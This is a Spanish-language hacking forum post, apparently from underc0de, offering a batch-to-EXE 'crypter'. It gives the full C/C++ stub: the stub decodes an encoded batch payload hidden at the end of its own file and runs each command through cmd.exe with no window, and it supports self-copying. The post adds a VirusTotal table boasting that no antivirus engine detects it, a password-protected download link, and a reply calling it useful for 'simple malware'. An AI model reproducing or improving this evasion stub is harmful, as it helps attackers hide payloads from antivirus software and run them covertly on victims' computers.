Hola, esta es una herramienta para quienes se dedican a programar scripts o sus cosas en batch, lo que hace este compilador es pasar tu programa a Ejecutable y lo crypta
y en ningún momento crea en el disco el archivo ni desencryptado ni cryptado, ejecuta comando por comando en memoria.
pueden usarse la variable %0 para autocopiarce con el nombre del ejecutable.
(http://i59.tinypic.com/r73g3b.png)
CitarCodigo del Stub! [C/C++]
#include <windows.h>
int __stdcall ExecuteCommand ( IN LPSTR lpszCommand );
int __stdcall Decrypt ( LPSTR String, LPSTR Out );
int __stdcall ExecuteCommand ( IN LPSTR lpszCommand )
{
LPSTR szPath;
char newcommand [ lstrlenA ( lpszCommand ) + 50 ];
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory ( &si, sizeof ( si ) );
ZeroMemory ( &pi, sizeof ( pi ) );
si.cb = sizeof ( si );
szPath = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( MAX_PATH + 1 ) );
GetSystemDirectoryA ( szPath, MAX_PATH );
CopyMemory ( &szPath [ lstrlenA ( szPath ) ], &"\\cmd.exe", lstrlenA ( "cmd.exe" ) + 1 );
wsprintfA ( newcommand, "/c %s", lpszCommand );
CreateProcessA ( szPath, newcommand, 0, 0, false, CREATE_NO_WINDOW, 0, 0, &si, &pi );
//ShellExecuteA ( HWND_DESKTOP, "open", szPath, newcommand, 0, SW_HIDE );
WaitForSingleObject ( pi.hProcess, INFINITE );
CloseHandle ( pi.hProcess );
CloseHandle ( pi.hThread );
GlobalFree ( szPath );
return 0;
}
//Funcion para desencryptar palabras
int __stdcall Decrypt ( LPSTR String, LPSTR Out )
{
for ( ; *String != '\0'; *String ++ )
{
if ( ( *String >= 65 ) && ( *String < 90 ) )
{
*Out = *String - 1;
}
else if ( ( *String >= 65 ) && ( *String == 90 ) )
{
*Out = *String + 1;
}
else if ( ( *String >= 97 ) && ( *String < 122 ) )
{
*Out = *String - 1;
}
else if ( ( *String >= 97 ) && ( *String == 122 ) )
{
*Out = *String - 1;
}
else
{
*Out = *String;
}
*Out ++;
}
return 0;
}
int WINAPI WinMain ( HINSTANCE hThisInstance, HINSTANCE hPrevInstance,
LPSTR lpszArgument, int nCmdFunstil )
{
DWORD dwBytes, dwSize;
HANDLE File;
LPSTR Buffer, Command, AppName, backup;
register DWORD bytes = 0, x = 0, total = 0, test = 0;
AppName = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( MAX_PATH + 1 ) );
GetModuleFileNameA ( GetModuleHandleA ( 0L ), AppName, MAX_PATH );
File = CreateFileA ( AppName, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, 0, 0 );
if ( File == INVALID_HANDLE_VALUE )
{
CloseHandle ( File );
return EXIT_FAILURE;
}
dwSize = GetFileSize ( File, 0 );
Buffer = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( dwSize + 1 ) );
ReadFile ( File, Buffer, dwSize, &dwBytes, 0 );
CloseHandle ( File );
//Buscamos la firma de nuestro programa.
for ( bytes; bytes <= dwSize; bytes ++ )
{
if ( Buffer [ bytes ] == '*' && Buffer [ bytes + 1 ] == '+' &&
Buffer [ bytes + 2 ] == '+' && Buffer [ bytes + 3 ] == '*' )
{
//Ajustamos el buffer y el nuevo tamaño.
Buffer += ( bytes + 4 );
dwSize -= ( bytes + 4 );
break;
}
}
//Desencryptamos el codigo en nustro EOF.
backup = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( lstrlenA ( Buffer + 1 ) ) );
CopyMemory ( &backup [ 0 ], &Buffer [ 0 ], lstrlenA ( Buffer ) );
GlobalFree ( Buffer );
Buffer = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( lstrlenA ( backup ) + 1 ) );
Decrypt ( backup, Buffer );
GlobalFree ( backup );
for ( bytes = 0; bytes <= lstrlenA ( Buffer ); bytes ++ )
{
if ( Buffer [ bytes ] == 13 || Buffer [ bytes ] == '\n' )
{
Command = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( bytes + 10 ) );
CopyMemory ( &Command [ 0 ], &Buffer [ 0 ], ( bytes ) );
total = lstrlenA ( Command );
for ( x = 0; x <= total; x ++ )
{
//En caso de existir la variable %0 - la sustituimos por la ruta de nuestro ejecutable.
if ( ( Command [ x ] == '%' ) && ( Command [ x + 1 ] == 48 ) )
{
backup = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( lstrlenA ( Command ) + 1 ) );
CopyMemory ( &backup [ 0 ], &Command [ 0 ], lstrlenA ( Command ) );
GlobalFree ( Command );
Command = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( bytes + lstrlenA ( AppName ) + MAX_PATH ) );
CopyMemory ( &Command [ 0 ], &backup [ 0 ], x - 1 );
lstrcatA ( Command, " " );
backup += ( x + 2 );
CopyMemory ( &Command [ lstrlenA ( Command ) ], &AppName [ 0 ], lstrlenA ( AppName ) );
CopyMemory ( &Command [ lstrlenA ( Command ) ], &backup [ 0 ], total - ( x + 2 ) );
GlobalFree ( backup );
break;
}
}
for ( test = 0; test <= lstrlenA ( Command ); test ++ )
{
if ( ( Command [ test ] == 13 ) || ( Command [ test ] == '\n' ) )
{
backup = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( lstrlenA ( Command ) + 1 ) );
CopyMemory ( &backup [ 0 ], &Command [ 0 ], test );
ExecuteCommand ( backup );
Command += ( test + 1 );
GlobalFree ( backup );
}
}
//Ejecutamos el comando
ExecuteCommand ( Command );
//Reajustamos el buffer.
Buffer += ( bytes + 2 );
//Liberamos el buffer.
GlobalFree ( Command );
}
}
GlobalFree ( AppName );
GlobalFree ( Buffer );
return EXIT_SUCCESS;
}
ANALISIS FUD
https://www.virustotal.com/es/file/fa0463bec54d2fd2c2417cd4e993b6c889231d0db6934ebfcfc3c58d867e1edc/analysis/1439185320/ (https://www.virustotal.com/es/file/fa0463bec54d2fd2c2417cd4e993b6c889231d0db6934ebfcfc3c58d867e1edc/analysis/1439185320/)
Antivirus Resultado Actualización
ALYac 20150805 Clean
AVG 20150805 Clean
AVware 20150805 Clean
Ad-Aware 20150805 Clean
AegisLab 20150805 Clean
Agnitum 20150804 Clean
AhnLab-V3 20150805 Clean
Alibaba 20150803 Clean
Antiy-AVL 20150805 Clean
Arcabit 20150805 Clean
Avast 20150805 Clean
Avira 20150805 Clean
Baidu-International 20150805 Clean
BitDefender 20150805 Clean
Bkav 20150805 Clean
ByteHero 20150805 Clean
CAT-QuickHeal 20150805 Clean
ClamAV 20150805 Clean
Comodo 20150805 Clean
Cyren 20150805 Clean
DrWeb 20150805 Clean
ESET-NOD32 20150805 Clean
Emsisoft 20150805 Clean
F-Prot 20150805 Clean
F-Secure 20150805 Clean
Fortinet 20150804 Clean
GData 20150805 Clean
Ikarus 20150805 Clean
Jiangmin 20150804 Clean
K7AntiVirus 20150805 Clean
K7GW 20150805 Clean
Kaspersky 20150805 Clean
Kingsoft 20150805 Clean
Malwarebytes 20150805 Clean
McAfee 20150805 Clean
McAfee-GW-Edition 20150805 Clean
MicroWorld-eScan 20150805 Clean
Microsoft 20150805 Clean
NANO-Antivirus 20150805 Clean
Panda 20150805 Clean
Qihoo-360 20150805 Clean
Rising 20150731 Clean
SUPERAntiSpyware 20150805 Clean
Sophos 20150805 Clean
Symantec 20150805 Clean
Tencent 20150805 Clean
TheHacker 20150805 Clean
TotalDefense 20150805 Clean
TrendMicro 20150805 Clean
TrendMicro-HouseCall 20150805Clean
VBA32 20150805 Clean
VIPRE 20150805 Clean
ViRobot 20150805 Clean
Zillya 20150805 Clean
Zoner 20150805 Clean
nProtect 20150805 Clean
Link de descarga:
https://mega.co.nz/#!zhhQwRKS!C_IsGCohosSGorjNMibdVSuVIS67C0yK3Q66kQbDIg4 (https://mega.co.nz/#!zhhQwRKS!C_IsGCohosSGorjNMibdVSuVIS67C0yK3Q66kQbDIg4)
PASS: xxneeco83xx
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
Clásico pero efectivo, muchas gracias @xxneeco83xx (https://underc0de.org/foro/index.php?action=profile;u=48441)
Por nada! si bien hay muchas cosas que se le pueden agregar, y mejorar, es practico para esos scripts o malwares simples.